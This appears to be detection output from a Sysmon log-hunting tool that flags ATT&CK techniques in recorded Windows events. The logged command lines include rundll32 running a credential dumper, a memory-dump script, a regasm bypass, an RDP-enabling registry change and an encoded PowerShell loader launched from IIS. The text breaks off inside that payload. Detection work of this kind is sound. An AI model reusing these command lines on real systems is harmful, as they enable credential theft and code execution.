alice.insecurebank.local + + + + + + 2019-06-21 07:35:50.093 + ECAD0485-88D6-5D0C-0000-001007AA1D00 + 1568 + C:\Windows\System32\rundll32.exe + 6.3.9600.17415 (winblue_r4.141028-1500) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump + C:\Users\administrator\Desktop\x64\ + insecurebank\Administrator + ECAD0485-87E3-5D0C-0000-0020266A0F00 + 0xf6a26 + 2 + High + SHA1=D4AC232D507769FFD004439C15302916A40D9831,MD5=6C308D32AFA41D26CE2A0EA8F7B79565,SHA256=5CC2C563D89257964C4B446F54AFE1E57BBEE49315A9FC001FF5A6BCB6650393,IMPHASH=156B2AC675B1B9202AF35C643105610C + ECAD0485-8897-5D0C-0000-0010A2FA1C00 + 3964 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",alice.insecurebank.local,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1561102550.259077,2019-06-21T11:35:50.259077+04:00,,Threat,High,"Found User (insecurebank\Administrator) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 238378 + + + + + Microsoft-Windows-Sysmon/Operational + alice.insecurebank.local + + + + + + 2019-06-21 07:35:50.093 + ECAD0485-88D6-5D0C-0000-001007AA1D00 + 1568 + C:\Windows\System32\rundll32.exe + 6.3.9600.17415 (winblue_r4.141028-1500) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump + C:\Users\administrator\Desktop\x64\ + insecurebank\Administrator + ECAD0485-87E3-5D0C-0000-0020266A0F00 + 0xf6a26 + 2 + High + SHA1=D4AC232D507769FFD004439C15302916A40D9831,MD5=6C308D32AFA41D26CE2A0EA8F7B79565,SHA256=5CC2C563D89257964C4B446F54AFE1E57BBEE49315A9FC001FF5A6BCB6650393,IMPHASH=156B2AC675B1B9202AF35C643105610C + ECAD0485-8897-5D0C-0000-0010A2FA1C00 + 3964 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",alice.insecurebank.local,Microsoft-Windows-Sysmon/Operational +[ T1059 ] wscript or cscript runing script,1567169648.171875,2019-08-30T16:54:08.171875+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (cscript c:\ProgramData\memdump.vbs notepad.exe) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (C:\Windows\System32\cmd.exe) in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 32151 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-30 12:54:07.823 + 747F3D96-1C6F-5D69-0000-0010323C1F00 + 2576 + C:\Windows\System32\cscript.exe + 5.812.10240.16384 + Microsoft ® Console Based Script Host + Microsoft ® Windows Script Host + Microsoft Corporation + cscript c:\ProgramData\memdump.vbs notepad.exe + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-1B6A-5D69-0000-0020E5810E00 + 0xe81e5 + 1 + High + SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC + 747F3D96-1B6C-5D69-0000-00106F060F00 + 2128 + C:\Windows\System32\cmd.exe + C:\Windows\System32\cmd.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436014.411034,2019-07-30T01:33:34.411034+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe /U AllTheThings.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4922 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:34.216 + 747F3D96-662E-5D3F-0000-001011038900 + 6020 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe /U AllTheThings.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1556380674.165738,2019-04-27T19:57:54.165738+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /c del /q "C:\Users\IEUser\Downloads\Flash_update.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6622 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1059,technique_name=Command-Line Interface + 2019-04-27 15:57:54.087 + 365ABB72-7C02-5CC4-0000-0010FD6E0C00 + 3188 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\cmd.exe" /c del /q "C:\Users\IEUser\Downloads\Flash_update.exe" + C:\Users\IEUser\AppData\Roaming\ + IEWIN7\IEUser + 365ABB72-7AB1-5CC4-0000-0020BEF40000 + 0xf4be + 1 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-7C01-5CC4-0000-00102B3E0C00 + 2680 + C:\Users\IEUser\Downloads\Flash_update.exe + "C:\Users\IEUser\Downloads\Flash_update.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1112] process updating fDenyTSConnections or UserAuthentication registry key values,1552853889.282593,2019-03-18T00:18:09.282593+04:00,,Threat,High,[T1112] process updating fDenyTSConnections or UserAuthentication registry key values,13," + + + + + 13 + 2 + 4 + 13 + 0 + 0x8000000000000000 + + + 5267 + + + + + Microsoft-Windows-Sysmon/Operational + PC04.example.corp + + + + + + SetValue + 2019-03-17 20:18:09.272 + 365ABB72-AB70-5C8E-0000-0010DF1F0A00 + 3700 + C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst.exe + HKLM\System\CurrentControlSet\Control\Terminal Server\fDenyTSConnections + DWORD (0x00000000) + +",PC04.example.corp,Microsoft-Windows-Sysmon/Operational +[ T1086 ] Powershell with Suspicious Argument,1558920522.711005,2019-05-27T05:28:42.711005+04:00,,Threat,Critical,"Found User (IIS APPPOOL\DefaultAppPool) run Suspicious PowerShell commands that include ( -enc , -noni ,-noni,-nop,powershell,\Windows\System32,ls, -t , -w ) in event with Command Line ("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==) and Parent Image :C:\Windows\System32\inetsrv\w3wp.exe , Parent CommandLine (c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool" -v "v2.0" -l "webengine4.dll" -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h "C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config" -w "" -m 0 -t 20) in directory : ( C:\Windows\Temp\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5875 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:28:42.700 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C + 365ABB72-3251-5CEB-0000-00109E06E100 + 748 + C:\Windows\System32\inetsrv\w3wp.exe + c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool" -v "v2.0" -l "webengine4.dll" -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h "C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config" -w "" -m 0 -t 20 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T1003 ] Credential Dumping ImageLoad,1555606693.74034,2019-04-18T20:58:13.740340+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 20 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1003,technique_name=Credential Dumping + 2019-04-18 16:58:13.560 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + C:\Windows\System32\hid.dll + 6.1.7600.16385 (win7_rtm.090713-1255) + Hid User Library + Microsoft® Windows® Operating System + Microsoft Corporation + SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE + true + Microsoft Windows + Valid + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +Detect IIS/Exchange Exploitation,1558920522.711005,2019-05-27T05:28:42.711005+04:00,,Threat,Critical,IIS run command with user (IIS APPPOOL\DefaultAppPool) and process name (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe) and commandline ( "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5875 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:28:42.700 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8